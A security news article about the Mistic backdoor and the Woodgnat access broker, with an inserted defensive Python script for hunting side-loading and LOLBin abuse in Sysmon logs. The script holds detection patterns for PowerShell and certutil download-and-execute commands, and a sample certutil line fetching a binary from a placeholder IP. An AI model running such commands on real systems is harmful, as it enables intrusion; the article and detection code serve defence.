HelpnetSecurity

Stealthy new backdoor surfaces in attacks on multiple sectors


A relatively new backdoor called Mistic has been deployed in multiple attacks since April 2026 targeting organizations in the insurance, education, IT, and professional services sectors, according to Symantec.

The malware appears to be associated with Woodgnat, also known as KongTuke, a financially motivated initial access broker (IAB) active since at least May 2024 that has been connected to ransomware operations including Qilin, Interlock, Rhysida, Akira, 8Base, and Black Basta.

“Woodgnat reportedly functions primarily as an IAB. Its goal is not to deliver the final payload, but to establish highly durable remote access within an enterprise and sell this high-level access to ransomware affiliates and other attackers for a fee,” the researchers said.

Earlier this month, Zscaler documented the backdoor under the name MLTBackdoor.

In one intrusion, researchers observed Mistic deployed alongside ModeloRAT, a Python-based remote access trojan developed by Woodgnat.

Huntress first reported on ModeloRAT in January 2026 during an investigation into a ClickFix campaign dubbed CrashFix. The campaign used a malicious Chrome extension named NexShield, disguised as an ad blocker, to intentionally crash victims’ browsers and trick them into running PowerShell commands that led to the deployment of ModeloRAT.

“Mistic was side-loaded through MpExtMs.exe, a legitimate file, and loaded from a DLL named EndpointDlp.dll, a name associated with Microsoft endpoint-security tooling. This would help the backdoor blend in with trusted software,” researchers noted.

Attackers also loaded a .NET DLL on the victim network that displayed a fake login screen and stole credentials entered by users.

Once installed, Mistic communicates with its command-and-control infrastructure and receives instructions from the operator.

Its capabilities include uploading, downloading, moving, renaming, and deleting files, creating folders, modifying how frequently it checks for commands, executing code received from the command-and-control server directly in memory, and terminating and removing itself from an infected system.

“The fact that Mistic executes in memory and also has a kill switch built in means that it is very stealthy, potentially allowing for long-term access for attackers,” they added.

In addition to Mistic and ModeloRAT, the attackers used several legitimate tools, including curl, Reg.exe, Net.exe, PowerShell, Certutil, and WMIC (the Windows Management Instrumentation command-line utility). These living-off-the-land binaries can be used to download files, execute commands, modify the Windows registry, gather information about a system, and interact with remote hosts, and because they ship with Windows their use rarely stands out on its own.
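The side-loading pairing quoted above (MpExtMs.exe picking up EndpointDlp.dll) and the utilities listed here are the two behaviours a defender can hunt for directly in endpoint telemetry. The following Python is an added example, not code from Symantec, Zscaler or Huntress, that runs both checks over Sysmon-style image-load (Event ID 7) and process-creation (Event ID 1) events and then looks for hosts where the two signals coincide. The sample events, the "running from a user-writable directory" heuristic and the command-line patterns are constructed for illustration and are not published indicators; the Sysmon field names (Image, ImageLoaded, Signed, Signature, SignatureStatus, CommandLine) are real.

```python
"""Hunt for the MpExtMs.exe / EndpointDlp.dll side-load and the LOLBin
usage described in the article, over Sysmon-style events (added example)."""
import re
from pathlib import PureWindowsPath
from typing import Optional

# Host binary and the DLL it should not be resolving from an attacker's
# directory (file names taken from the article).
SIDELOAD_PAIRS = {"mpextms.exe": {"endpointdlp.dll"}}

# Heuristic (an assumption of this example): a security component that runs
# from a user-writable location is suspect even when the DLL name is right.
USER_WRITABLE = ("\\users\\", "\\temp\\")

# Utilities named in the article with command-line patterns typical of
# download / execute / persist / privilege changes. Illustrative patterns,
# not a published signature set; tune them to your environment.
LOLBIN_PATTERNS = {
    "certutil.exe": re.compile(r"-urlcache|-decode|-encode", re.I),
    "curl.exe": re.compile(r"(^|\s)-o\s|--output\b", re.I),
    "wmic.exe": re.compile(r"process\s+call\s+create", re.I),
    "reg.exe": re.compile(r"\\currentversion\\run", re.I),
    "net.exe": re.compile(r"\b(local)?group\b.*\s/add\b|\buser\b.*\s/add\b", re.I),
    "powershell.exe": re.compile(
        r"-enc\w*\s|downloadstring|\biex\b|-w(indowstyle)?\s+hidden", re.I),
}


def _basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def _user_writable(path: str) -> bool:
    lowered = path.lower()
    return any(marker in lowered for marker in USER_WRITABLE)


def check_image_load(ev: dict) -> Optional[str]:
    """Sysmon Event ID 7. Flags the watched host/DLL pair unless the DLL is
    validly Microsoft-signed and the host runs from a non-writable path."""
    host, dll = _basename(ev["Image"]), _basename(ev["ImageLoaded"])
    if dll not in SIDELOAD_PAIRS.get(host, ()):
        return None
    ms_signed = (
        ev.get("Signed", "").lower() == "true"
        and ev.get("SignatureStatus", "").lower() == "valid"
        and "microsoft" in ev.get("Signature", "").lower()
    )
    if ms_signed and not _user_writable(ev["Image"]):
        return None
    return f"{host} loaded {ev['ImageLoaded']} (microsoft_signed={ms_signed})"


def check_process_create(ev: dict) -> Optional[str]:
    """Sysmon Event ID 1. Returns the command line when a listed utility is
    invoked with one of the suspicious patterns; plain 'net view' is ignored."""
    pattern = LOLBIN_PATTERNS.get(_basename(ev["Image"]))
    cmd = ev.get("CommandLine", "")
    return cmd if pattern and pattern.search(cmd) else None


def hunt(events) -> list:
    """Run both checks; each finding is (computer, rule, detail)."""
    findings = []
    for ev in events:
        if ev["EventID"] == 7:
            detail, rule = check_image_load(ev), "sideload"
        elif ev["EventID"] == 1:
            detail, rule = check_process_create(ev), "lolbin"
        else:
            continue
        if detail:
            findings.append((ev["Computer"], rule, detail))
    return findings


def high_confidence(findings) -> set:
    """Hosts where the side-load and LOLBin signals coincide, the combination
    the article describes rather than either signal alone."""
    rules_by_host = {}
    for computer, rule, _ in findings:
        rules_by_host.setdefault(computer, set()).add(rule)
    return {h for h, r in rules_by_host.items() if {"sideload", "lolbin"} <= r}


# Constructed sample telemetry (not real events); paths are assumptions.
SAMPLE_EVENTS = [
    {"EventID": 7, "Computer": "ws01",
     "Image": r"C:\Users\jdoe\AppData\Local\Temp\svc\MpExtMs.exe",
     "ImageLoaded": r"C:\Users\jdoe\AppData\Local\Temp\svc\EndpointDlp.dll",
     "Signed": "false", "Signature": "", "SignatureStatus": "Unavailable"},
    {"EventID": 7, "Computer": "ws02",
     "Image": r"C:\Program Files\Windows Defender\MpExtMs.exe",
     "ImageLoaded": r"C:\Program Files\Windows Defender\EndpointDlp.dll",
     "Signed": "true", "Signature": "Microsoft Windows", "SignatureStatus": "Valid"},
    {"EventID": 1, "Computer": "ws01", "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil -urlcache -split -f http://203.0.113.10/a.bin a.bin"},
    {"EventID": 1, "Computer": "ws01", "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": 'wmic process call create "C:\\Users\\Public\\svc\\MpExtMs.exe"'},
    {"EventID": 1, "Computer": "ws03", "Image": r"C:\Windows\System32\net.exe",
     "CommandLine": "net view"},
]

if __name__ == "__main__":
    found = hunt(SAMPLE_EVENTS)
    for computer, rule, detail in found:
        print(f"{computer:6} {rule:9} {detail}")
    print("high confidence:", sorted(high_confidence(found)))
```

The point of the last step is precision: a copy of a Defender executable in a temp directory, or one certutil download, each produce a finding, but only a host showing both earns the high-confidence label, which keeps the alert volume from the common utilities manageable while still catching the chain the article describes.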

Woodgnat’s victim selection is “largely opportunistic,” Symantec said, adding that the group’s geographic location remains unknown.

Symantec has published a list of indicators of compromise for Mistic, along with malicious files and IP addresses used in the recent Woodgnat attacks.
